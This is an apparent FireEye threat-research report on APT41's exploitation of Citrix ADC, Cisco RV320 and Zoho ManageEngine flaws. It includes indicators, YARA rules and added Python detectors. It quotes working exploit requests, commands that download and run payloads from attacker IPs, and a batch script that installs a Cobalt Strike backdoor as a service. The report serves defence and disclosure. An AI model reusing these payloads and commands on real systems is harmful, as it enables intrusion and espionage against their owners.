Beginning this year, FireEye observed Chinese actor APT41 carry out one of the broadest campaigns by a Chinese cyber espionage actor we have observed in recent years. Between January 20 and March 11, FireEye observed APT41 attempt to exploit vulnerabilities in [Citrix NetScaler/ADC](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), Cisco routers, and [Zoho ManageEngine Desktop Central](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) at over 75 FireEye customers. Countries we’ve seen targeted include Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK and USA. The following industries were targeted: Banking/Finance, Construction, Defense Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil & Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, and Utility. It’s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature.
#### Exploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC])
Starting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to attempt exploits of Citrix Application Delivery Controller (ADC) and Citrix Gateway devices with [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>) (published December 17, 2019).

Figure 1: Timeline of key events
The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command ‘file /bin/pwd’, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the [mitigation](<https://support.citrix.com/article/CTX267679>) wasn’t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.
One interesting thing to note is that all observed requests were only performed against Citrix devices, suggesting APT41 was operating with an already-known list of identified devices accessible on the internet.
```http
POST /vpns/portal/scripts/newbm.pl HTTP/1.1
Host: [redacted]
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
NSC_NONCE: nsroot
NSC_USER: ../../../netscaler/portal/templates/[redacted]
Content-Length: 96

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]
```

---

Figure 2: Example APT41 HTTP traffic exploiting CVE-2019-19781
There is a lull in APT41 activity between January 23 and February 1, likely related to the Chinese Lunar New Year holidays, which took place between January 24 and January 30, 2020. This has been a common activity pattern for Chinese APT groups in past years as well.
Starting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of ‘test’ and a password that we have redacted, and then downloaded an unknown payload named ‘bsd’ (which was likely a backdoor).
```http
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Accept-Encoding: identity
Content-Length: 147
Connection: close
Nsc_User: ../../../netscaler/portal/templates/[redacted]
User-Agent: Python-urllib/2.7
Nsc_Nonce: nsroot
Host: [redacted]
Content-Type: application/x-www-form-urlencoded

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd`') %]
```

---

Figure 3: Example APT41 HTTP traffic exploiting CVE-2019-19781
We did not observe APT41 activity at FireEye customers between February 2 and February 19, 2020. China initiated COVID-19 related quarantines in cities in Hubei province starting on January 23 and January 24, and rolled out quarantines to additional provinces starting between February 2 and February 10. While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry. We observed a significant uptick in CVE-2019-19781 exploitation on February 24 and February 25. The exploit behavior was almost identical to the activity on February 1, with only the payload name changed to ‘un’.
```http
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Accept-Encoding: identity
Content-Length: 145
Connection: close
Nsc_User: ../../../netscaler/portal/templates/[redacted]
User-Agent: Python-urllib/2.7
Nsc_Nonce: nsroot
Host: [redacted]
Content-Type: application/x-www-form-urlencoded

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un`') %]
```

---

Figure 4: Example APT41 HTTP traffic exploiting CVE-2019-19781
Citrix released a [mitigation](<https://support.citrix.com/article/CTX267027>) for CVE-2019-19781 on December 17, 2019, and as of January 24, 2020, released permanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP.
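The request pattern in Figures 2 through 4 is easy to pick out of web or proxy logs once you know what to look for: a POST to the newbm.pl script (possibly reached through /vpn/../vpns/), a path-traversal NSC_USER header, and a Template Toolkit directive in the body. The following checker is an added example, not code from the FireEye post; it flags such requests and extracts the injected command for the analyst. The sample requests are constructed in the shape of the figures, with attacker values marked REDACTED and a documentation-range IP address standing in for the real infrastructure.

```python
"""
Added example (not FireEye's code): flag HTTP requests that match the
CVE-2019-19781 exploitation pattern from Figures 2-4 and extract the
injected command. Sample requests below are constructed, not captures.
"""
import re
from urllib.parse import unquote

TEMPLATE_DIRECTIVE = re.compile(r"\[%\s*(.*?)\s*%\]", re.S)
BACKTICK_COMMAND = re.compile(r"`([^`]*)`")

# Constructed samples: a recon-style request (Figure 2), a legitimate bookmark
# save by an authenticated user, and a traversal variant (Figure 3).
SAMPLE_REQUESTS = [
    "POST /vpns/portal/scripts/newbm.pl HTTP/1.1\r\n"
    "Host: gateway.example\r\n"
    "User-Agent: python-requests/2.22.0\r\n"
    "NSC_NONCE: nsroot\r\n"
    "NSC_USER: ../../../netscaler/portal/templates/REDACTED\r\n"
    "\r\n"
    "url=http://example.com&title=REDACTED&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]",

    "POST /vpns/portal/scripts/newbm.pl HTTP/1.1\r\n"
    "Host: gateway.example\r\n"
    "NSC_USER: alice\r\n"
    "\r\n"
    "url=http://intranet.example&title=Wiki&desc=Team wiki",

    "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1\r\n"
    "Host: gateway.example\r\n"
    "User-Agent: Python-urllib/2.7\r\n"
    "Nsc_User: ../../../netscaler/portal/templates/REDACTED\r\n"
    "\r\n"
    "url=http://example.com&title=REDACTED&desc=[% template.new('BLOCK' = "
    "'print `/usr/bin/ftp -o /tmp/un ftp://test:REDACTED@198.51.100.7/un`') %]",
]


def parse_request(raw):
    """Split a raw HTTP request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def normalize_path(path):
    """Resolve '/x/../' segments so /vpn/../vpns/ is seen as /vpns/."""
    path = unquote(path)
    while True:
        collapsed = re.sub(r"/[^/]+/\.\./", "/", path, count=1)
        if collapsed == path:
            return path
        path = collapsed


def check_cve_2019_19781(raw):
    """Return findings for one request. 'suspicious' is True when the request
    reaches the /vpns/ script with a traversal NSC_USER header or a template
    directive in the body; 'commands' holds any backtick-wrapped commands."""
    req = parse_request(raw)
    path = normalize_path(req["path"])
    findings, commands = [], []
    hits_script = path.startswith("/vpns/")
    if hits_script:
        findings.append("request to /vpns/ script: " + path)
    nsc_user = req["headers"].get("nsc_user", "")
    traversal = "../" in nsc_user
    if traversal:
        findings.append("path traversal in NSC_USER: " + nsc_user)
    directives = TEMPLATE_DIRECTIVE.findall(unquote(req["body"]))
    for directive in directives:
        findings.append("template directive in body: " + directive)
        commands.extend(BACKTICK_COMMAND.findall(directive))
    return {"suspicious": hits_script and (traversal or bool(directives)),
            "findings": findings, "commands": commands}


def scan(requests):
    """Run the checker over a list of raw requests, one result per request."""
    return [check_cve_2019_19781(r) for r in requests]


if __name__ == "__main__":
    for result in scan(SAMPLE_REQUESTS):
        print(result)
```

The traversal variant matters in practice: a rule that only matches the literal string `/vpns/` in the request line misses the `/vpn/../vpns/` form from Figures 3 and 4, which is why the path is normalized before the prefix test.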
#### Cisco Router Exploitation
On February 21, 2020, APT41 successfully exploited a Cisco RV320 router at a telecommunications organization and downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc). It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVEs ([CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) and [CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>)) to [enable remote code execution on Cisco RV320 and RV325](<https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce>) small business routers and uses wget to download the specified payload.
```http
GET /test/fuc HTTP/1.1
Host: 66.42.98[.]220
User-Agent: Wget
Connection: close
```

---

Figure 5: Example HTTP request showing Cisco RV320 router downloading a payload via wget
66.42.98[.]220 also hosted a file named 1.txt at http://66.42.98[.]220/test/1.txt. The content of 1.txt (MD5: c0c467c8e9b2046d7053642cc9bdd57d) is ‘cat /etc/flash/etc/nk_sysconfig’, which is the command one would execute on a Cisco RV320 router to display the current configuration.
Cisco PSIRT confirmed that fixed software to address the noted vulnerabilities is available and asks customers to review the following security advisories and take appropriate action:
* [Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>)
* [Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>)
#### Exploitation of CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)
On March 5, 2020, researcher [Steven Seeley](<https://twitter.com/steventseeley/status/1235635108498948096?s=20>) published [an advisory](<https://srcincite.io/advisories/src-2020-0011/>) and released [proof-of-concept code](<https://srcincite.io/pocs/src-2020-0011.py.txt>) for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>)). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. In the first variation, the CVE-2020-10189 exploit was used to directly upload “logger.zip”, a simple Java-based program containing a set of commands that use PowerShell to download and execute install.bat and storesyncsvc.dll.
```text
java/lang/Runtime
getRuntime
()Ljava/lang/Runtime;
Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll','C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat
'(Ljava/lang/String;)Ljava/lang/Process;
StackMapTable
ysoserial/Pwner76328858520609
Lysoserial/Pwner76328858520609;
```

---

Figure 6: Contents of logger.zip
Here we see a toolmark from the tool [ysoserial](<https://github.com/frohoff/ysoserial>) that was used to create the payload in the POC. The string Pwner76328858520609 is unique to the POC payload, indicating that APT41 likely used the POC as source material in their operation.
In the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345.
```text
Parent Process: C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe
Process Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\Users\Public\install.bat
```

---

Figure 7: Example FireEye Endpoint Security event depicting successful CVE-2020-10189 exploitation
In both variations, the install.bat batch file was used to install persistence for a trial-version Cobalt Strike BEACON loader named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).
```batch
@echo off
set "WORK_DIR=C:\Windows\System32"
set "DLL_NAME=storesyncsvc.dll"
set "SERVICE_NAME=StorSyncSvc"
set "DISPLAY_NAME=Storage Sync Service"
set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."
sc stop %SERVICE_NAME%
sc delete %SERVICE_NAME%
mkdir %WORK_DIR%
copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f
sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"
SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000
sc description "%SERVICE_NAME%" "%DESCRIPTION%"
reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f
net start "%SERVICE_NAME%"
```

---

Figure 8: Contents of install.bat
Storesyncsvc.dll was a Cobalt Strike BEACON implant (trial-version) which connected to exchange.dumb1[.]com (with a DNS resolution of 74.82.201[.]8) using a jquery malleable command and control (C2) profile.
```http
GET /jquery-3.3.1.min.js HTTP/1.1
Host: cdn.bootcss.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cdn.bootcss.com/
Accept-Encoding: gzip, deflate
Cookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYMDA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
```

---

Figure 9: Example APT41 Cobalt Strike BEACON jquery malleable C2 profile HTTP request
Within a few hours of initial exploitation, APT41 used the storesyncsvc.dll BEACON backdoor to download a secondary backdoor with a different C2 address. The download was performed with Microsoft CertUtil, a common TTP that we’ve observed APT41 use in past intrusions, and retrieved 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). The file 2.exe was a VMProtected Meterpreter downloader used to download Cobalt Strike BEACON shellcode. The use of VMProtected binaries is another very common TTP that we’ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit.
```http
GET /2.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.3
Host: 91.208.184[.]78
```

---

Figure 10: Example HTTP request downloading ‘2.exe’ VMProtected Meterpreter downloader via CertUtil
```batch
certutil -urlcache -split -f http://91.208.184[.]78/2.exe
```

---

Figure 11: Example CertUtil command to download ‘2.exe’ VMProtected Meterpreter downloader
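The endpoint side of this chain (Figures 7, 8 and 11, and the behavioral entries in the Indicators table below) comes down to a handful of process-creation patterns: Desktop Central's java.exe spawning cmd.exe or bitsadmin.exe, certutil fetching a URL with -urlcache, bitsadmin /transfer from an http URL, PowerShell's Net.WebClient downloading a file, and the reg add / sc create pair that registers a new svchost-hosted service. The triage script below is an added example, not FireEye's code or detection content; the events are constructed records in the shape of an EDR process-creation log, with a documentation-range IP in place of the real C2 address.

```python
"""
Added example (not FireEye's code): triage constructed process-creation
events for the post-exploitation patterns described in the post.
"""
import re

# Constructed sample events (not real telemetry): parent image, child image
# and command line, as most EDR process-creation logs record them.
SAMPLE_EVENTS = [
    {"parent": r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c bitsadmin /transfer bbbb http://198.51.100.7:12345/test/install.bat C:\Users\Public\install.bat"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://198.51.100.7/2.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell $client = new-object System.Net.WebClient;"
                "$client.DownloadFile('http://198.51.100.7:12345/test/storesyncsvc.dll','C:\\Windows\\Temp\\storesyncsvc.dll')"},
    {"parent": r"C:\Windows\System32\services.exe",           # benign certutil use
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -verify C:\certs\server.cer"},
    {"parent": r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe",  # java spawning java
     "image": r"C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe",
     "cmdline": "java -version"},
    {"parent": r"C:\Windows\System32\cmd.exe",                 # install.bat, svchost group
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "StorSyncSvc" /t REG_MULTI_SZ /d "StorSyncSvc" /f'},
    {"parent": r"C:\Windows\System32\cmd.exe",                 # install.bat, service creation
     "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r'sc create "StorSyncSvc" binPath= "C:\Windows\system32\svchost.exe -k StorSyncSvc" type= share start= auto'},
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _search(pattern, text):
    return re.search(pattern, text, re.I) is not None


# (rule name, predicate over one event)
RULES = [
    ("desktop-central-java-spawns-shell",
     lambda e: "desktopcentral_server" in e["parent"].lower()
               and basename(e["parent"]) == "java.exe"
               and basename(e["image"]) in {"cmd.exe", "bitsadmin.exe", "powershell.exe"}),
    ("certutil-url-download",
     lambda e: basename(e["image"]) == "certutil.exe"
               and _search(r"-urlcache\b", e["cmdline"])
               and _search(r"https?://", e["cmdline"])),
    ("bitsadmin-transfer-from-url",
     lambda e: _search(r"\bbitsadmin(\.exe)?\s+/transfer\b.*https?://", e["cmdline"])),
    ("powershell-webclient-download",
     lambda e: basename(e["image"]) == "powershell.exe"
               and _search(r"net\.webclient", e["cmdline"])
               and _search(r"downloadfile|downloadstring", e["cmdline"])),
    ("svchost-group-registration",
     lambda e: basename(e["image"]) == "reg.exe"
               and _search(r"\badd\b.*CurrentVersion\\Svchost", e["cmdline"])),
    ("new-service-hosted-in-svchost",
     lambda e: basename(e["image"]) == "sc.exe"
               and _search(r"\bcreate\b.*svchost\.exe\s+-k\b", e["cmdline"])),
]


def triage(event):
    """Names of the rules one event matches, in RULES order."""
    return [name for name, predicate in RULES if predicate(event)]


def triage_all(events):
    return [triage(e) for e in events]


if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, triage_all(SAMPLE_EVENTS)):
        print(basename(event["image"]), "->", hits or "clean")
```

The two install.bat rules fire on separate events because the batch file runs reg.exe and sc.exe as separate children of cmd.exe; correlating a svchost group registration with a service creation that points svchost at the same group name, within a short window, is a higher-fidelity signal than either command on its own.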
The Meterpreter downloader ‘TzGG’ was configured to communicate with 91.208.184[.]78 over port 443 to download the shellcode (MD5: 659bd19b562059f3f0cc978e15624fd9) for Cobalt Strike BEACON (trial-version).
```http
GET /TzGG HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
Host: 91.208.184[.]78:443
Connection: Keep-Alive
Cache-Control: no-cache
```

---

Figure 12: Example HTTP request downloading ‘TzGG’ shellcode for Cobalt Strike BEACON
The downloaded BEACON shellcode connected to the same C2 server: 91.208.184[.]78. We believe this is an example of the actor attempting to diversify post-exploitation access to the compromised systems.
ManageEngine released a short term [mitigation](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) for CVE-2020-10189 on January 20, 2020, and subsequently released an [update](<https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html?utm_source=rce-kb>) on March 7, 2020, with a long term fix.
#### Outlook
This activity is one of the most widespread campaigns we have seen from China-nexus espionage actors in recent years. While APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation _has focused on a subset of our customers_, and seems to reveal a high operational tempo and wide collection requirements for APT41.
It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.
Previously, FireEye Mandiant Managed Defense identified APT41 successfully leveraging CVE-2019-3396 (Atlassian Confluence) against a U.S.-based university. While APT41 is a unique state-sponsored Chinese threat group that conducts espionage, the actor also conducts financially motivated activity for personal gain.
#### Indicators
Type | Indicator(s)
---|---
CVE-2019-19781 Exploitation (Citrix Application Delivery Control) | 66.42.98[.]220<br>CVE-2019-19781 exploitation attempts with a payload of ‘file /bin/pwd’<br>CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/bsd’<br>CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un’<br>/tmp/bsd<br>/tmp/un
Cisco Router Exploitation | 66.42.98[.]220<br>‘1.txt’ (MD5: c0c467c8e9b2046d7053642cc9bdd57d)<br>‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc)
CVE-2020-10189 (Zoho ManageEngine Desktop Central) | 66.42.98[.]220<br>91.208.184[.]78<br>74.82.201[.]8<br>exchange.dumb1[.]com<br>install.bat (MD5: 7966c2c546b71e800397a67f942858d0)<br>storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f)<br>C:\Windows\Temp\storesyncsvc.dll<br>C:\Windows\Temp\install.bat<br>2.exe (MD5: 3e856162c36b532925c8226b4ed3481c)<br>C:\Users\\[redacted]\install.bat<br>TzGG (MD5: 659bd19b562059f3f0cc978e15624fd9)<br>C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe spawning cmd.exe and/or bitsadmin.exe<br>Certutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78<br>PowerShell downloading files with Net.WebClient
#### Detecting the Techniques
FireEye detects this activity across our platforms. This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.
Platform | Signature Name
---|---
Endpoint Security | BITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY)<br>CERTUTIL.EXE DOWNLOADER A (UTILITY)<br>Generic.mg.5909983db4d9023e<br>Generic.mg.3e856162c36b5329<br>POWERSHELL DOWNLOADER (METHODOLOGY)<br>SUSPICIOUS BITSADMIN USAGE B (METHODOLOGY)<br>SAMWELL (BACKDOOR)<br>SUSPICIOUS CODE EXECUTION FROM ZOHO MANAGE ENGINE (EXPLOIT)
Network Security | Backdoor.Meterpreter<br>DTI.Callback<br>Exploit.CitrixNetScaler<br>Trojan.METASTAGE<br>Exploit.ZohoManageEngine.CVE-2020-10198.Pwner<br>Exploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader
Helix | CITRIX ADC [Suspicious Commands]<br>EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt]<br>EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success]<br>EXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access]<br>EXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning]<br>MALWARE METHODOLOGY [Certutil User-Agent]<br>WINDOWS METHODOLOGY [BITSadmin Transfer]<br>WINDOWS METHODOLOGY [Certutil Downloader]
#### MITRE ATT&CK Technique Mapping
ATT&CK | Techniques
---|---
Initial Access | External Remote Services (T1133), Exploit Public-Facing Application (T1190)
Execution | PowerShell (T1086), Scripting (T1064)
Persistence | New Service (T1050)
Privilege Escalation | Exploitation for Privilege Escalation (T1068)
Defense Evasion | BITS Jobs (T1197), Process Injection (T1055)
Command And Control | Remote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071)
#### Appendix A: Discovery Rules
The following Yara rules serve as examples of discovery rules for APT41 actor TTPs, turning the adversary methods or tradecraft into new haystacks for purposes of detection or hunting. For all tradecraft-based discovery rules, we recommend deliberate testing and tuning prior to implementation in any production system. Some of these rules are tailored to build concise haystacks that are easy to review for high-fidelity detections. Some of these rules are broad in aperture that build larger haystacks for further automation or processing in threat hunting systems.
```yara
import "pe"

rule ExportEngine_APT41_Loader_String
{
    meta:
        author = "@stvemillertime"
        description = "This looks for a common APT41 Export DLL name in BEACON shellcode loaders, such as loader_X86_svchost.dll"
    strings:
        $pcre = /loader_[\x00-\x7F]{1,}\x00/
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))
}

rule ExportEngine_ShortName
{
    meta:
        author = "@stvemillertime"
        description = "This looks for Win PEs where Export DLL name is a single character"
    strings:
        $pcre = /[A-Za-z0-9]{1}\.(dll|exe|dat|bin|sys)/
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))
}

rule ExportEngine_xArch
{
    meta:
        author = "@stvemillertime"
        description = "This looks for Win PEs where Export DLL name is a something like x32.dat"
    strings:
        $pcre = /[\x00-\x7F]{1,}x(32|64|86)\.dat\x00/
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))
}

rule RareEquities_LibTomCrypt
{
    meta:
        author = "@stvemillertime"
        description = "This looks for executables with strings from LibTomCrypt as seen by some APT41-esque actors https://github.com/libtom/libtomcrypt - might catch everything BEACON as well. You may want to exclude Golang and UPX packed samples."
    strings:
        $a1 = "LibTomMath"
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $a1
}

rule RareEquities_KCP
{
    meta:
        author = "@stvemillertime"
        description = "This is a wide catchall rule looking for executables with equities for a transport library called KCP, https://github.com/skywind3000/kcp Matches on this rule may have built-in KCP transport ability."
    strings:
        $a01 = "[RO] %ld bytes"
        $a02 = "recv sn=%lu"
        $a03 = "[RI] %d bytes"
        $a04 = "input ack: sn=%lu rtt=%ld rto=%ld"
        $a05 = "input psh: sn=%lu ts=%lu"
        $a06 = "input probe"
        $a07 = "input wins: %lu"
        $a08 = "rcv_nxt=%lu\\n"
        $a09 = "snd(buf=%d, queue=%d)\\n"
        $a10 = "rcv(buf=%d, queue=%d)\\n"
        $a11 = "rcvbuf"
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 5MB and 3 of ($a*)
}

rule ConventionEngine_Term_Users
{
    meta:
        author = "@stvemillertime"
        description = "Searching for PE files with PDB path keywords, terms or anomalies."
        sample_md5 = "09e4e6fa85b802c46bc121fcaecc5666"
        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"
    strings:
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Users[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre
}

rule ConventionEngine_Term_Desktop
{
    meta:
        author = "@stvemillertime"
        description = "Searching for PE files with PDB path keywords, terms or anomalies."
        sample_md5 = "71cdba3859ca8bd03c1e996a790c04f9"
        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"
    strings:
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Desktop[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre
}

rule ConventionEngine_Anomaly_MultiPDB_Double
{
    meta:
        author = "@stvemillertime"
        description = "Searching for PE files with PDB path keywords, terms or anomalies."
        sample_md5 = "013f3bde3f1022b6cf3f2e541d19353c"
        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"
    strings:
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #pcre == 2
}
```
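The three ExportEngine_* rules share one condition: walk the PE header to the export directory, read the Name RVA stored 12 bytes into that table, convert it to a file offset, and require the regex to match exactly there. The script below is an added example, not FireEye's code, that reproduces that lookup in plain Python so the logic can be tested or ported to a pipeline without YARA; the PE image it builds is constructed inline (a minimal PE32 with a single .edata section) and is not one of the samples from the post.

```python
"""
Added example (not FireEye's code): reproduce in Python what the
ExportEngine_* YARA conditions compute, then test the three name patterns
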